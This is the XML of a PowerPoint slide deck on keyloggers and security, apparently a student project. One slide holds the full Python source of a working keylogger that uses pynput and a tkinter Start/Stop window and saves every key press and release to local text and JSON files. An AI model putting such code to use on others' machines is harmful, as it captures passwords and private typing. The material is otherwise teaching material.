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7" r:id="rId2"/>
    <p:sldId id="258" r:id="rId3"/>
    <p:sldId id="259" r:id="rId4"/>
    <p:sldId id="260" r:id="rId5"/>
    <p:sldId id="261" r:id="rId6"/>
    <p:sldId id="262" r:id="rId7"/>
    <p:sldId id="270"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1048670"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1"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4"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1048636"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7"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048625"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6"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1048642"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3"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lstStyle/>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1048648"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lstStyle/>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1048656"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7"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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048614"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1048615"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6"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8"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104865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48666"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7"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8"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1048631"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lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Keyloggers and security</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048590"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1048591" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3117529" y="4586365"/>
            <a:ext cx="7980183"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1. NAVIN J -KINGS ENGINEERING COLLEGE-CSE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1048612" name="Content Placeholder 1"/>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a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="305435" indent="-305435"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Result (Output Image)</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a:cs typeface="Calibri Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104860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a:solidFill>
            <a:srgbClr val="02A5E3"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Result</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048680" name="Content Placeholder 1048679"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1399073" y="2179225"/>
            <a:ext cx="7206447" cy="3518306"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="3">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>tk</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> import keyboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>json</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> = []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>keys = ""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    with open('key_log.txt', "w+") as keys:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>keys.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    with open('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>key_log.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>', '+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>wb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>') as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>key_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>key_list_bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>json.dumps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>).encode()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>key_log.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>key_list_bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>, keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    if flag == False:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>            {'Pressed': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>        )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>        flag = True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>            {'Held': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>        )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>, keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>        {'Released': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>        flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    keys = keys + str(key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(str(keys))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    global listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    listener = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>keyboard.Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>listener.start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(state='disabled')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(state='normal')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    global listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>listener.stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(text="Keylogger stopped.")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(state='normal')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(state='disabled')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>root = Tk()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>root.title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>("Keylogger")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>label = Label(root, text='Click "Start" to begin keylogging.')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(anchor=CENTER)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>label.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>start_button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> = Button(root, text="Start", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>start_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(side=LEFT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>stop_button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t> = Button(root, text="Stop", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>, state='disabled')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>stop_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>(side=RIGHT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>root.geometry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0"/>
              <a:t>("250x250")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="900" dirty="0" err="1"/>
              <a:t>root.mainloop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="9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1048608" name="Content Placeholder 1"/>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Content Placeholder 2"/>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1048610" name="Title 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535670" y="844659"/>
            <a:ext cx="11029616" cy="530296"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit fontScale="788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1240</Words>
  <Application>Microsoft Office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Keyloggers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Vaibhav Ostwal</dc:creator>
  <cp:lastModifiedBy>Navin J</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-09T06:27:22Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-13T05:12:37Z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7a7c519ad0554087ba2849901c103f39</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOProductBuildVer">
